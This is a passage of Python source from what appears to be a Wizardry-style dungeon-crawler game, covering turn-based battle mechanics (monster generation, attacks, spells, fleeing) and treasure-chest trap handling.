in mg.monsters:\n if m.state in [State.OK]:\n active += 1\n self.ew.print(\n f\"{i}) {len(mg.monsters)} {dispname.ljust(24)} ({active})\", start=' ')\n\n def create_monsterparty(self):\n \"\"\"\n Create a monster party and save it to self.monp\n \"\"\"\n if self.boss:\n bosses = {\n 3: 'daemon kid',\n 6: 'the lady',\n 9: 'atlas',\n 10: 'daemon lord',\n }\n mname = bosses[self.game.party.floor]\n else:\n candidates = []\n for mname in self.game.mondef:\n if self.game.party.floor <= 10:\n if self.game.party.floor in self.game.mondef[mname].floors:\n candidates.append(mname)\n else:\n if 0 in self.game.mondef[mname].floors:\n candidates.append(mname)\n mname = random.choice(candidates)\n if mname == '':\n breakpoint() # +++++++++++++++++++++\n self.friendly = False\n while len(self.monp) < 4: # up to 4 groups\n mdef = self.game.mondef[mname]\n if len(self.monp) == 0: # 1st group\n if mdef.friendly and random.randrange(100) < 10: # 1/10\n self.friendly = True\n\n mong = Monstergrp(self.game, mname)\n self.monp.append(mong)\n for _ in range(dice(mdef.number)):\n mon = Monster(self.game, mname)\n mong.monsters.append(mon)\n self.gold += mdef.level * (random.randrange(15) + 10)\n if mdef.fellowp <= random.randrange(100):\n break\n mname = mdef.fellow\n # top monster defines treasure levels\n self.game.chest.items = self.monp[0].mdef.treasure\n return\n\n def canrun(self, entity):\n \"\"\"\n Return True if party was able to run away from the battle\n \"\"\"\n if isinstance(entity, Monster):\n if 65 > random.randrange(100):\n return True\n else:\n return False\n success = pl = el = 0\n for mg in self.monp:\n for m in mg.monsters:\n if m.state == State.OK:\n el += self.game.mondef[m.name].level\n for mem in self.game.party.members:\n if mem.state == State.OK:\n pl += mem.level\n if pl > el:\n success += 20\n\n if len(self.game.party.members) == 1:\n success += 15\n elif len(self.game.party.members) == 2:\n success += 10\n elif len(self.game.party.members) == 3:\n success += 5\n\n if success + 75 > random.randrange(100):\n return True\n else:\n return False\n\n def handle_friendly(self, place):\n \"\"\"\n Handle friendly monsters.\n Return True if leave, False if fight\n \"\"\"\n v = self.game.vscr\n if len(self.monp) > 1:\n dispname = 'monsters'\n else:\n mong = self.monp[0]\n if mong.identified:\n dispname = mong.name\n if len(mong.monsters) > 1:\n dispname = mong.mdef.names\n else:\n dispname = mong.mdef.unident\n if len(mong.monsters) > 1:\n dispname = mong.mdef.unidents\n if self.friendly:\n self.surprised = 0\n self.mw.print(f\"You encountered friendly {dispname}.\")\n c = self.mw.input_char(\"Leave? (y/n)\", values=['y', 'n'])\n if c == 'y':\n idx = self.room_index\n if idx >= 0: # room encounter\n self.game.party.floor_obj.battled[idx] = True\n return True\n else:\n self.mw.print(f\"You encountered {dispname}.\")\n return False\n\n def enemy_action(self):\n \"\"\"\n Decide enemy/monster actions\n \"\"\"\n if self.surprised == 1: # you surprised the monsters\n return\n mondef = self.game.mondef\n party = self.game.party\n for mong in self.monp:\n for mon in mong.monsters:\n if mon.state != State.OK:\n continue\n action = mondef[mong.name].act[random.randrange(5)]\n agi = mondef[mong.name].agi + random.randrange(4)\n if action == 'run':\n self.entities.append(\n Entity(mon, mong.name, mong, agi, 'run', None))\n elif action == 'breath':\n self.entities.append(\n Entity(mon, mong.name, mong, agi, 'breath', None))\n elif action == 'atk' or self.surprised == 2:\n targets = [mem for mem in party.members\n if mem.state in [State.OK, State.ASLEEP]]\n if len(targets) > 3:\n if party.floor > 3 and random.randrange(100) < 40:\n target = random.choice(targets)\n else:\n target = targets[random.randrange(3)]\n else:\n target = random.choice(targets)\n self.entities.append(\n Entity(mon, mong.name, mong, agi, 'fight', target))\n else:\n if action in self.game.spelldef:\n self.entities.append(\n Entity(mon, mong.name, mong, agi, action, None))\n else:\n self.entities.append(\n Entity(mon, mong.name, mong, agi, 'parry', None))\n\n def input_action(self):\n \"\"\"\n Input party member actions\n return True if ran successfully\n \"\"\"\n self.entities = []\n for mem in self.game.party.members:\n mem.action = '????????????'\n if self.surprised == 2: # monsters surprised you\n return False\n while True:\n self.mw.print(f\"Options - f)ight s)pell u)se\")\n self.mw.print(f\"d)ispell p)arry r)un t)ake back\", start=' ')\n for idx, mem in enumerate(self.game.party.members, 1):\n if mem.state not in [State.OK]:\n continue\n while True:\n c = self.mw.input_char(f\"{mem.name}'s action?\",\n values=['f', 's', 'u', 'p', 'r', 't', 'd'])\n agi = mem.stat[4] + random.randrange(5)\n if c == 'r':\n if self.canrun(mem):\n return True\n else:\n return False # failed\n elif c == 't':\n self.entities = []\n for mem in self.game.party.members:\n mem.action = '????????????'\n self.mw.print(\"..taking back\")\n self.game.vscr.disp_scrwin()\n break\n elif c == 'p':\n mem.action = 'parry'\n self.entities.append(\n Entity(mem, mem.name, None, agi, 'parry', None))\n self.game.vscr.disp_scrwin()\n break\n elif c == 'f':\n wrange = 'short'\n for item in mem.items:\n idef = self.game.itemdef[item[0]]\n if item[1] and idef.type.lower() == 'weapon' \\\n and idef.range.lower() == 'long':\n wrange = 'long'\n if idx > 3 and wrange == 'short':\n self.mw.print(\"Weapon range too short.\")\n self.game.vscr.disp_scrwin()\n continue\n mong = self.monp[self.choose_group()]\n self.entities.append(\n Entity(mem, mem.name, None, agi, 'fight', mong))\n mem.action = 'fight'\n self.game.vscr.disp_scrwin()\n break\n elif c == 'd':\n if mem.job not in [Job.PRIEST, Job.BISHOP, Job.LORD]:\n continue\n mong = self.monp[self.choose_group()]\n self.entities.append(\n Entity(mem, mem.name, None, agi, 'dispell', mong))\n mem.action = 'dispell'\n self.game.vscr.disp_scrwin()\n break\n elif c == 's':\n if self.surprised == 1: # you surprised the monsters\n continue\n s, target = self.choose_spell(mem)\n self.entities.append(\n Entity(mem, mem.name, None, agi, s, target))\n mem.action = s\n self.game.vscr.disp_scrwin()\n break\n elif c == 'u':\n item, target = self.choose_item(mem)\n if not item:\n continue\n self.entities.append(\n Entity(mem, mem.name, None, agi, item, target))\n mem.action = item\n self.game.vscr.disp_scrwin()\n break\n if c == 't':\n break\n if c != 't':\n self.mw.print(\"Press any key or t)ake back >\")\n self.game.vscr.disp_scrwin()\n c = getch(wait=True)\n if c == 't':\n self.entities = []\n for mem in self.game.party.members:\n mem.action = '????????????'\n continue\n break\n\n def choose_group(self):\n \"\"\"\n choose monster group and return group #\n \"\"\"\n if len(self.monp) == 1:\n return 0\n while True:\n self.mw.print(f\"Which group? (#)\")\n self.game.vscr.disp_scrwin()\n n = getch(wait=True)\n try:\n n = int(n)\n except:\n continue\n if n > len(self.monp):\n continue\n return n-1\n\n def choose_spell(self, mem):\n \"\"\"\n Choose spell to cast and the target monster group or the party member\n \"\"\"\n mw = self.mw\n s = mw.input(\"What spell to cast?\")\n s = s.lower()\n if s not in self.game.spelldef: # No such spell\n return s, None\n elif s not in list(itertools.chain(mem.mspells, mem.pspells)):\n return s, None # not mastered yet\n sdef = self.game.spelldef[s]\n if sdef.target == 'enemy' or sdef.target == 'group':\n target = self.monp[self.choose_group()]\n elif sdef.target == 'member':\n while True:\n ch = mw.input_char(f\"To who? (#)\")\n try:\n if 0 <= (chid := int(ch)-1) < len(self.game.party.members):\n break\n except:\n pass\n target = self.game.party.members[chid]\n else:\n target = None\n return s, target\n\n def choose_item(self, mem):\n \"\"\"\n Choose item to use. If the item has spell power and the\n spell needs target to choose, have player specify target.\n \"\"\"\n mw = self.mw\n mw.print(\"Which item to use?\")\n for i, item in enumerate(mem.items, 1):\n if item[3]:\n dispitem = ''.join(['?', self.game.itemdef[item[0]].unident])\n else:\n dispitem = item[0]\n mw.print(f\"{i}) {dispitem}\")\n idx = mw.input_char(\"Item # or l)eave\",\n values=['1', '2', '3', '4', '5', '6', '7', '8', 'l'])\n if idx == 'l':\n return False, None\n idef = mem.items[int(idx)-1]\n if idef[3]:\n iname = ''.join(['?', self.game.itemdef[idef[0]].unident])\n else:\n iname = idef[0]\n spell = self.game.itemdef[idef[0]].use\n if spell != '' and spell in self.game.spelldef and \\\n iname == idef[0]:\n target = self.game.spelldef[spell].target\n if target == 'member':\n m = self.game.party.choose_character(self.game)\n if not m:\n return False, None\n return iname, m\n elif target in ['group', 'enemy']:\n mong = self.monp[self.choose_group()]\n return iname, mong\n return iname, None\n\n def monster_attack(self, e):\n \"\"\"\n Monster attacks a member\n \"\"\"\n mdef = self.game.mondef[e.name]\n if e.group.identified:\n dispname = e.name\n else:\n dispname = mdef.unident\n if mdef.type in ['animal', 'undead', 'dragon', 'insect']:\n verb = random.choice(['tears', 'rips', 'gnaws', 'bites', 'claws'])\n else:\n verb = random.choice(\n ['swings', 'thrusts', 'stabs', 'slashes', 'chops'])\n if e.target.state in [State.DEAD, State.ASHED, State.LOST]:\n self.mw.print(f\"{e.name} lost its target.\")\n return\n\n apoint = 19\n if e.target.action == 'parry':\n apoint += 2\n apoint -= self.game.mondef[e.name].level + 2\n bpoint = apoint - e.target.ac - e.target.acplus - self.game.party.ac\n\n if bpoint >= 19:\n val = 19\n elif 0 <= bpoint < 19:\n val = bpoint\n elif -36 <= bpoint < 0:\n val = 0\n else:\n if apoint < 0:\n val = 0\n else:\n val = 19\n hitp = (19 - val)*100//20 # hit percent\n\n hitcnt = 0\n damage = 0\n for _ in range(self.game.mondef[e.name].count):\n if hitp > random.randrange(100):\n hitcnt += 1\n damage += dice(self.game.mondef[e.name].attack)\n e.target.hp -= damage\n if e.target.state != State.OK:\n e.target.hp -= damage # twice the damage if not status OK\n self.mw.print(f\"{dispname} {verb} at {e.target.name}.\")\n self.mw.print(f\"{e.target.name} incurred {damage} damage.\", start=' ')\n self.game.vscr.disp_scrwin()\n if e.target.hp <= 0:\n e.target.hp = 0\n e.target.state = State.DEAD\n self.mw.print(f\"{e.target.name} is killed.\", start=' ')\n return\n if hitcnt == 0:\n return\n\n regist = set()\n for item in e.target.items:\n if item[1]: # equipped\n regist |= set(self.game.itemdef[item[0]].regist)\n\n if self.game.mondef[e.name].poison:\n if (e.target.stat[5]+1)*100//20 < random.randrange(100):\n if 'poison' not in regist:\n e.target.poisoned = True\n e.target.hpplus -= 1\n self.mw.print(f\"{e.target.name} is poisoned.\")\n\n if self.game.mondef[e.name].paraly:\n if (e.target.stat[5]+1)*100//20 < random.randrange(100):\n if 'paraly' not in regist:\n e.target.state = State.PARALYZED\n self.mw.print(f\"{e.target.name} is paralyzed.\")\n\n if self.game.mondef[e.name].stone:\n if (e.target.stat[5]+1)*100//20 < random.randrange(100):\n if 'stone' not in regist:\n e.target.state = State.STONED\n self.mw.print(f\"{e.target.name} is petrified.\")\n\n if not e.target.drained and self.game.mondef[e.name].drain > 0:\n if (e.target.stat[5]+1)*100//20 < random.randrange(100):\n if 'drain' not in regist:\n prevlevel = e.target.level\n e.target.level -= self.game.mondef[e.name].drain\n if e.target.level-1 < 13:\n e.target.exp = level_table[e.target.job][e.target.level-2]\n else:\n e.target.exp = level_table[e.target.job][11] +\\\n level_table[e.target.job][12]*(e.target.level-13)\n if e.target.level < 13:\n e.target.nextexp = level_table[e.target.job][e.target.level-1]\n else:\n e.target.nextexp = level_table[e.target.job][11] +\\\n level_table[e.target.job][12]*(e.target.level-12)\n self.mw.print(\n f\"{e.target.name} is drained by {self.game.mondef[e.name].drain} level.\")\n if e.target.level < 1:\n e.target.hp = 0\n e.target.state = State.LOST\n self.mw.print(f\"{e.target.name} is lost.\")\n return\n e.target.maxhp = \\\n e.target.maxhp * \\\n (prevlevel - self.game.mondef[e.name].drain) \\\n // prevlevel\n if e.target.hp > e.target.maxhp:\n e.target.hp = e.target.maxhp\n e.target.drained = True\n\n if self.game.mondef[e.name].critical:\n if (e.target.stat[5]+1)*100//20 < random.randrange(100):\n if 'critical' not in regist:\n if (49 - self.game.mondef[e.name].level) * 100 / 50 \\\n < random.randrange(100):\n e.target.state = State.DEAD\n e.target.hp = 0\n self.mw.print(f\"{e.target.name} is decapitated.\")\n\n def dispell(self, e):\n \"\"\"\n Party member dispells a monster group\n \"\"\"\n mondef = self.game.mondef[e.target.name]\n if e.target.identified:\n dispname = e.target.name\n else:\n dispname = mondef.unident\n self.mw.print(f\"{e.name} tried to dispell.\")\n if mondef.type != 'undead':\n self.mw.print(\"Not undead.\", start=' ')\n return\n dspl_power = e.entity.level * 5 + 50\n dspl_regist = 10 * mondef.level\n if dspl_power > 255:\n chance = 100\n else:\n chance = max(5, dspl_power - dspl_regist)\n target_cp = e.target.monsters[:]\n for mon in target_cp:\n if random.randrange(100) < chance:\n mon.state = State.DEAD\n mon.hp = 0\n self.mw.print(f\"{dispname} is dispelled.\", start=' ')\n e.target.monsters.remove(mon)\n if not e.target.monsters:\n self.game.battle.monp.remove(e.target)\n else:\n self.mw.print(f\"{dispname} registed to dispell.\", start=' ')\n\n def member_attack(self, e):\n \"\"\"\n Party member attacks a monster\n \"\"\"\n if e.entity.job in [Job.MAGE, Job.THIEF, Job.BISHOP]:\n lvbonus = e.entity.level // 5\n else:\n lvbonus = e.entity.level // 3 + 2\n strbonus = 0\n if e.entity.stat[0] >= 16:\n strbonus = e.entity.stat[0] - 15\n elif e.entity.stat[0] < 6:\n strbonus = e.entity.stat[0] - 6\n st_bonus = weapat = 0\n weapon = None\n for item in e.entity.items:\n if item[1]: # equpped?\n # (check align)\n itemdef = self.game.itemdef[item[0]]\n if not itemdef.align or e.entity.align in itemdef.align:\n st_bonus += itemdef.st\n else:\n st_bonus = -1\n if itemdef.type.lower() == 'weapon':\n weapon = itemdef # for later use\n weapat = weapon.at\n hitability = lvbonus + strbonus + st_bonus\n for idx, g in enumerate(self.monp):\n if g == e.entity:\n break\n hitpercent = (self.game.mondef[e.target.name].ac\n - idx + hitability) * 100 // 20\n\n if e.entity.job == Job.NINJA:\n atkcnt = max(e.entity.level//5+2, weapat)\n elif e.entity.job in [Job.FIGHTER, Job.SAMURAI, Job.LORD]:\n atkcnt = max(e.entity.level//5+1, weapat)\n else:\n atkcnt = max(e.entity.level//10+1, weapat)\n if atkcnt > 10 and not e.entity.have_item('kaiden book', equip=True):\n atkcnt = 10\n\n damage = hitcnt = 0\n for _ in range(atkcnt):\n if hitpercent > random.randrange(100):\n if weapon is None:\n damage += dice('2D2') # w/o weapon\n else:\n # twice the damage depending on monster type\n if self.game.mondef[e.target.name].type in weapon.twice:\n damage += dice(weapon.dice) * 2\n else:\n damage += dice(weapon.dice)\n hitcnt += 1\n if e.target.identified:\n dispname = e.target.name\n else:\n dispname = self.game.mondef[e.target.name].unident\n if e.target.monsters[0].state != State.OK:\n damage *= 2\n verb = random.choice(['swings', 'thrusts', 'stabs', 'slashes'])\n self.mw.print(\n f\"{e.name} {verb} violently at {dispname} and hits {hitcnt} times for {damage} damage.\")\n e.target.monsters[0].hp -= damage\n\n if e.entity.job == Job.NINJA:\n crit = (e.entity.level -\n self.game.mondef[e.target.name].level) + 20\n if crit > 80:\n crit = 80\n elif crit < 5:\n crit = 5\n if crit > random.randrange(100):\n e.target.monsters[0].hp = 0\n e.target.monsters[0].state = State.DEAD\n self.mw.print(f\"{dispname} is decapitated!\")\n\n if e.target.monsters[0].hp <= 0:\n e.target.monsters[0].state = State.DEAD\n self.mw.print(f\"{dispname} is killed.\", start=' ')\n self.exp += self.game.mondef[e.target.name].exp\n e.entity.marks += 1\n e.target.monsters.pop(0)\n if not e.target.monsters:\n self.monp.remove(e.target)\n self.draw_ew()\n\n def reorder_party(self):\n \"\"\"\n Members with bad status move back.\n \"\"\"\n mems = self.game.party.members\n for mem in mems:\n if mem.state not in [State.OK]:\n mems.remove(mem)\n mems.append(mem)\n\n def identify_check(self):\n \"\"\"\n Identify the monster (group) at 50% possibility\n \"\"\"\n for mong in self.monp:\n if random.randrange(100) % 2:\n mong.identified = True\n\n def battle(self):\n \"\"\"\n battle main\n \"\"\"\n self.new_battle()\n place = self.game.party.place\n self.game.party.place = Place.BATTLE\n v = self.game.vscr\n v.meswins.append(self.ew)\n v.meswins.append(self.mw)\n self.mw.cls()\n\n self.create_monsterparty()\n self.draw_ew()\n\n if self.handle_friendly(place):\n party = self.game.party\n self.treasure = False\n for idx, room in enumerate(party.floor_obj.rooms):\n if room.in_room(party.x, party.y):\n party.floor_obj.battled[idx] = True\n break\n v.meswins.pop()\n v.meswins.pop()\n self.game.party.place = place\n return\n\n if self.surprised == 1:\n self.mw.print(\"You surprised the monsters.\\n - press space bar\")\n self.game.vscr.disp_scrwin()\n while getch(wait=True) != ' ':\n pass\n elif self.surprised == 2:\n self.mw.print(\"Monsters surprised you.\\n - press space bar\")\n self.game.vscr.disp_scrwin()\n while getch(wait=True) != ' ':\n pass\n\n while True:\n for m in self.game.party.members:\n m.action = '????????????'\n self.recover_state()\n self.reorder_party()\n self.identify_check()\n self.draw_ew()\n v.disp_scrwin()\n if self.input_action():\n self.ran = True\n v.meswins[0].print(\"Ran away from the battle.\")\n v.disp_scrwin()\n self.game.party.x, self.game.party.px =\\\n self.game.party.px, self.game.party.x\n self.game.party.y, self.game.party.py =\\\n self.game.party.py, self.game.party.y\n self.game.party.floor, self.game.party.pfloor =\\\n self.game.party.pfloor, self.game.party.floor\n self.game.party.floor_obj =\\\n self.game.dungeon.floors[self.game.party.floor-1]\n self.treasure = False\n break # ran successfully\n self.enemy_action()\n self.surprised = 0\n\n self.entities.sort(key=attrgetter('agi'), reverse=True)\n entities_tmp = self.entities[:]\n for e in entities_tmp:\n if not e.valid:\n continue\n dispname = e.name\n if isinstance(e.target, Monstergrp):\n if not self.monp:\n break\n if not e.target.monsters: # already the gorup is gone\n e.target = self.monp[0]\n if isinstance(e.entity, Monster):\n if not e.group.identified:\n dispname = self.game.mondef[e.name].unident\n if e.entity.state is State.ASLEEP:\n self.mw.print(f\"{dispname} is asleep.\")\n continue\n if e.entity.state not in [State.OK]:\n continue\n if not self.monp:\n break\n\n if e.action == 'parry':\n self.mw.print(f\"{dispname} parried.\")\n elif e.action == 'breath':\n self.mw.print(f\"{dispname} breathed on the party.\")\n for mem in self.game.party.members:\n damage = e.entity.hp // 2\n mem.hp = max(0, mem.hp - damage)\n self.mw.print(f\"{mem.name} incurred {damage} damage.\",\n start=' ')\n if mem.hp <= 0 and mem.state not in \\\n [State.DEAD, State.ASHED, State.LOST]:\n mem.state = State.DEAD\n self.mw.print(f\"{mem.name} is killed.\",\n start=' ')\n elif e.action == 'fight':\n if isinstance(e.entity, Member):\n self.member_attack(e)\n else:\n self.monster_attack(e)\n elif e.action == 'dispell':\n self.dispell(e)\n elif e.action == 'run': # monster only\n if self.canrun(e.entity):\n e.group.monsters.remove(e.entity)\n self.mw.print(f\"{dispname} ran away\")\n if not e.group.monsters:\n self.monp.remove(e.group)\n self.draw_ew()\n else:\n self.mw.print(f\"{dispname} tried to run away\")\n self.mw.print(f\".. but wasn't able to.\", start=' ')\n elif '?' in e.action: # tried to use unidentified item\n self.mw.print(f\"{dispname} tried to use {e.action}.\")\n self.mw.print(\n f\".. but doesn't know how to use it.\", start=' ')\n elif e.action in self.game.itemdef: # item\n item = self.game.itemdef[e.action]\n if item.use and (spell := self.game.spelldef[item.use].battle):\n self.mw.print(f\"{dispname} used {e.action}.\")\n self.mw.print(f\".. and invoked {spell}.\")\n v.disp_scrwin()\n getch(wait=True)\n self.game.spell.cast_spell_dispatch(\n e.entity, spell, e.target)\n else:\n self.mw.print(f\"{dispname} tried to use {e.action}.\")\n self.mw.print(f\".. but wasn't able to.\", start=' ')\n elif e.action in self.game.spelldef: # spell\n spelldef = self.game.spelldef[e.action]\n if isinstance(e.entity, Member):\n if (not spelldef.battle) or \\\n e.action not in list(itertools.chain(\n e.entity.mspells, e.entity.pspells)):\n self.mw.print(\n f\"{dispname} tried to cast {e.action}\")\n self.mw.print(\n f\".. but nothing happend.\", start=' ')\n v.disp_scrwin()\n getch(wait=True)\n continue\n else:\n if e.action in e.entity.mspells:\n if e.entity.mspell_cnt[spelldef.level-1] > 0:\n e.entity.mspell_cnt[spelldef.level-1] -= 1\n else:\n self.mw.print(\n f\"{dispname} tried to cast {e.action}\")\n self.mw.print(f\".. but MP is exhausted.\")\n v.disp_scrwin()\n getch(wait=True)\n continue\n else:\n if e.entity.pspell_cnt[spelldef.level-1] > 0:\n e.entity.pspell_cnt[spelldef.level-1] -= 1\n else:\n self.mw.print(\n f\"{dispname} tried to cast {e.action}\")\n self.mw.print(f\".. but MP is exhausted.\")\n v.disp_scrwin()\n getch(wait=True)\n continue\n if e.entity.silenced:\n self.mw.print(\n f\"{dispname} tried to cast {e.action} but silenced.\")\n else:\n self.mw.print(f\"{dispname} casted {e.action}.\")\n self.game.spell.cast_spell_dispatch(\n e.entity, e.action, e.target)\n self.clean_dead() # clean up dead monsters\n v.disp_scrwin()\n if not self.monp:\n break\n getch(wait=True)\n\n # Battle end?\n party = self.game.party\n if not self.monp:\n for idx, room in enumerate(party.floor_obj.rooms):\n if room.in_room(party.x, party.y):\n party.floor_obj.battled[idx] = True\n break\n v.disp_scrwin()\n getch(wait=True)\n break\n defeated = True\n for mem in party.members:\n if mem.state in [State.OK, State.ASLEEP]:\n defeated = False\n break\n if defeated:\n self.mw.print(\"The party lost the battle and defeated.\")\n self.mw.input_char(\" - press space bar\", values=[' '])\n party.place = Place.EDGE_OF_TOWN\n members = party.members[:]\n for mem in members:\n mem.hp = 0\n if mem.state in [State.PARALYZED, State.STONED]:\n mem.state = State.DEAD\n mem.in_maze = True\n mem.floor = party.floor # last known place for him/her\n party.members.remove(mem)\n party.floor = 0\n party.floor_move = 2\n party.light_cnt = 0\n party.ac = 0\n party.silenced = False\n party.identify = False\n party.gps = False\n break\n\n v.disp_scrwin()\n # getch()\n\n v.meswins.pop()\n v.meswins.pop()\n self.game.party.place = place\n return\n\n def clean_dead(self):\n \"\"\"\n clean up dead monsters from monp and entities so that\n dead monsters don't attack or continue to be target\n \"\"\"\n monp_tmp = self.monp[:]\n for mong in monp_tmp:\n mong_tmp = mong.monsters[:]\n for mon in mong_tmp:\n if mon.state in [State.DEAD, State.ASHED, State.LOST]:\n mon.hp = 0\n mong.monsters.remove(mon)\n e = [e for e in self.entities if e.entity is mon]\n if e:\n e[0].valid = False\n if not mong.monsters: # no alive monsters in grp\n self.monp.remove(mong)\n\n def recover_state(self):\n \"\"\"\n Every turn, asleep members/monsers might wake up.\n Also, hpplus to members/momsters\n \"\"\"\n v = self.game.vscr\n mw = v.meswins[-1]\n for mem in self.game.party.members:\n mem.hp = min(max(0, mem.hp+mem.hpplus), mem.maxhp)\n if mem.state == State.ASLEEP and random.randrange(100) < 50:\n mem.state = State.OK\n for mong in self.monp:\n for mon in mong.monsters:\n mon.hp = min(max(0, mon.hp+mon.hpplus), mon.maxhp)\n if mon.state == State.ASLEEP:\n if self.game.mondef[mon.name].weaksleep:\n chance = 15\n else:\n chance = 40\n if random.randrange(100) < chance:\n mon.state = State.OK\n\n def check_battle(self):\n \"\"\"\n Check if they'll have a battle\n Return 0 if False, 1 if random encounter, 2 if room battle.\n \"\"\"\n party = self.game.party\n rooms = party.floor_obj.rooms\n for idx, room in enumerate(rooms):\n if idx == 0:\n continue\n if room.in_room(party.x, party.y) \\\n and not party.floor_obj.battled[idx]:\n if random.randrange(100) < min(95, party.floor*10):\n self.room_index = idx\n return 2 # with room guardian\n else:\n party.floor_obj.battled[idx] = True\n if random.randrange(64) == 0:\n self.room_index = -1 # random encounter\n return 1 # random encounter\n\n return 0\n\n\nclass Entity:\n \"\"\"\n Represents a battle entity, either a monster or a party member\n \"\"\"\n\n def __init__(self, entity, name, group, agi, action, target):\n self.entity = entity # member or monster object\n self.name = name # member name or monster name (identified)\n self.group = group\n self.agi = agi # relative agility\n self.action = action #\n self.target = target # member obj, mongrp obj ('self', 'all'?)\n self.valid = True # valid flag\n\n\nclass Chest:\n \"\"\"\n Represents a chest\n \"\"\"\n\n def __init__(self, game):\n self.game = game\n self.mw = Meswin(game.vscr, 14, 3, 44, 10, frame=True)\n self.trap = Trap.TRAPLESS_CHEST\n self.items = None\n\n def chest(self):\n \"\"\"\n Chest main. Determine the trap, inspect, disarm, activate\n the trap, find items, etc.\n \"\"\"\n game = self.game\n v = game.vscr\n mw = self.mw\n v.meswins.append(mw)\n mw.cls()\n\n self.trap = self.choose_trap()\n for mem in game.party.members:\n mem.inspected = False\n mw.print(\"A chest!\")\n while True:\n mw.print(\"o)pen k)antei i)nspect d)isarm\")\n mw.print(\"l)eave alone\", start=' ')\n c = mw.input_char(\"Option?\", values=['o', 'k', 'i', 'd', 'l'])\n if c == 'l': # leave alone\n getch(wait=True)\n v.meswins.pop()\n return\n elif c == 'o':\n mem = game.party.choose_character(game)\n if not mem:\n continue\n self.trap_activated(mem)\n self.treasure()\n v.meswins.pop()\n return\n elif c == 'd': # disarm\n mem = game.party.choose_character(game)\n if not mem:\n continue\n ans = mw.input(\"Trap name?\")\n if ans == self.trap.name.lower().replace('_', ' '):\n if mem.job in [Job.THIEF, Job.NINJA]:\n chance = mem.level - game.party.floor + 50\n else:\n chance = mem.level - game.party.floor\n else:\n self.trap_activated(mem)\n self.treasure()\n v.meswins.pop()\n return\n if random.randrange(70) < chance:\n mw.print(\"Disarmed the trap.\", start=' ')\n self.treasure()\n v.meswins.pop()\n return\n if random.randrange(20) < mem.stat[4]: # agility\n mw.print(\"Failed to disarm.\", start=' ')\n v.disp_scrwin()\n continue\n self.trap_activated(mem)\n self.treasure()\n v.meswins.pop()\n return\n elif c == 'k': # calfo\n mem = game.party.choose_character(game)\n if not mem:\n continue\n if 'kantei' in mem.pspells and mem.pspell_cnt[1]:\n mem.pspell_cnt[1] -= 1\n mw.print(f\"{mem.name} casted kantei.\")\n if random.randrange(100) < 95:\n ans = self.trap\n else:\n ans = self.choose_trap()\n mw.print(f\"It is {ans.name.lower().replace('_', ' ')}.\",\n start=' ')\n else:\n mw.print(f\"{mem.name} failed to cast kantei.\", start=' ')\n v.disp_scrwin()\n getch(wait=True)\n elif c == 'i': # inspect\n mem = game.party.choose_character(game)\n if not mem:\n continue\n if mem.inspected:\n mw.print(\"Already inspected.\", start=' ')\n continue\n if mem.job == Job.THIEF:\n chance = mem.stat[4] * 6 # agility\n elif mem.job == Job.NINJA:\n chance = mem.stat[4] * 4\n else:\n chance = mem.stat[4]\n chance = min(chance, 95)\n if random.randrange(100) >= chance: # failed?\n if random.randrange(20) > mem.stat[4]:\n self.trap_activated(mem)\n self.treasure()\n v.meswins.pop()\n return\n else:\n ans = self.choose_trap()\n else: # succeeded to identify\n ans = self.trap\n mem.identified = True\n mw.print(f\"It is {ans.name.lower().replace('_', ' ')}.\",\n start=' ')\n v.disp_scrwin()\n\n def treasure(self):\n \"\"\"\n Find and get up to 4 items from the chest.\n \"\"\"\n mw = self.game.vscr.meswins[-1]\n got = False\n if len(self.items) > 0:\n if random.randrange(100) < 80: # 80%\n item = self.choose_item(self.items[0])\n self.get_item(item)\n got = True\n self.items.pop(0)\n if len(self.items) > 0:\n if random.randrange(100) < 40: # 40%\n item = self.choose_item(self.items[0])\n self.get_item(item)\n got = True\n self.items.pop(0)\n if len(self.items) > 0:\n if random.randrange(100) < 8: # 8%\n item = self.choose_item(self.items[0])\n self.get_item(item)\n got = True\n self.items.pop(0)\n if len(self.items) > 0:\n if random.randrange(100) < 1: # 1%\n item = self.choose_item(self.items[0])\n self.get_item(item)\n got = True\n if not got:\n mw.print(\"There was no interesting item.\")\n self.game.vscr.disp_scrwin()\n getch(wait=True)\n\n def choose_item(self, item_lvl):\n \"\"\"\n Randomly pick one item of the specified item level.\n \"\"\"\n items = []\n for item in self.game.itemdef:\n if self.game.itemdef[item].level == item_lvl:\n items.append(item)\n item = random.choice(items)\n return item\n\n def get_item(self, item):\n \"\"\"\n Someone in the party get the item found.\n \"\"\"\n v = self.game.vscr\n mw = v.meswins[-1]\n mem = random.choice(\n [mem for mem in self.game.party.members if len(mem.items) < 8])\n mem.items.append([item, False, False, True])\n mw.print(\n f\"{mem.name} found {self.game.itemdef[item].unident}\", start=' ')\n v.disp_scrwin()\n getch(wait=True)\n\n def trap_activated(self, mem):\n \"\"\"\n Trap is activated and do harm to party member(s).\n \"\"\"\n game = self.game\n v = game.vscr\n mw = self.mw\n if self.trap == Trap.TRAPLESS_CHEST:\n mw.print(f\"It was a trapless chest.\")\n v.disp_scrwin()\n getch(wait=True)\n return\n mw.print(f\"Oops, {self.trap.name.lower().replace('_', ' ')}!\")\n if self.trap == Trap.POISON_NEEDLE:\n # if not mem.poisoned:\n # mem.hpplus -= 1\n mem.poisoned = True\n mw.print(f\"{mem.name} was poisoned.\", start=' ')\n elif self.trap == Trap.GAS_BOMB:\n for m in game.party.members:\n if random.randrange(100) < 50:\n # if not m.poisoned:\n # mem.hpplus -= 1\n m.poisoned = True\n mw.print(f\"{m.name} was poisoned.\", start=' ')\n v.disp_scrwin()\n elif self.trap == Trap.CROSSBOW_BOLT:\n damage = dice('1D8')*game.party.floor\n mem.hp = max(mem.hp-damage, 0)\n mw.print(f\"{mem.name} incurred {damage} damage.\", start=' ')\n if mem.hp <= 0:\n mem.state = State.DEAD\n mw.print(f\"{mem.name} is killed.\", start=' ')\n v.disp_scrwin()\n elif self.trap == Trap.EXPLODING_BOX:\n for m in game.party.members:\n if random.randrange(100) < 75 and \\\n m.state not in [State.DEAD, State.ASHED, State.LOST]:\n if random.randrange(100) < 67:\n damage = dice('1D5') * game.party.floor\n else:\n damage = dice('1D8') * game.party.floor\n m.hp = max(m.hp-damage, 0)\n mw.print(f\"{m.name} incurred {damage} damage.\", start=' ')\n if m.hp <= 0:\n m.state = State.DEAD\n mw.print(f\"{m.name} is killed.\", start=' ')\n v.disp_scrwin()\n elif self.trap == Trap.STUNNER:\n mem.state = State.PARALYZED\n mw.print(f\"{mem.name} got stunned.\", start=' ')\n v.disp_scrwin()\n elif self.trap == Trap.TELEPORTER:\n mw.print(f\"Oops, teleporter!\", start=' ')\n v.disp_scrwin()\n 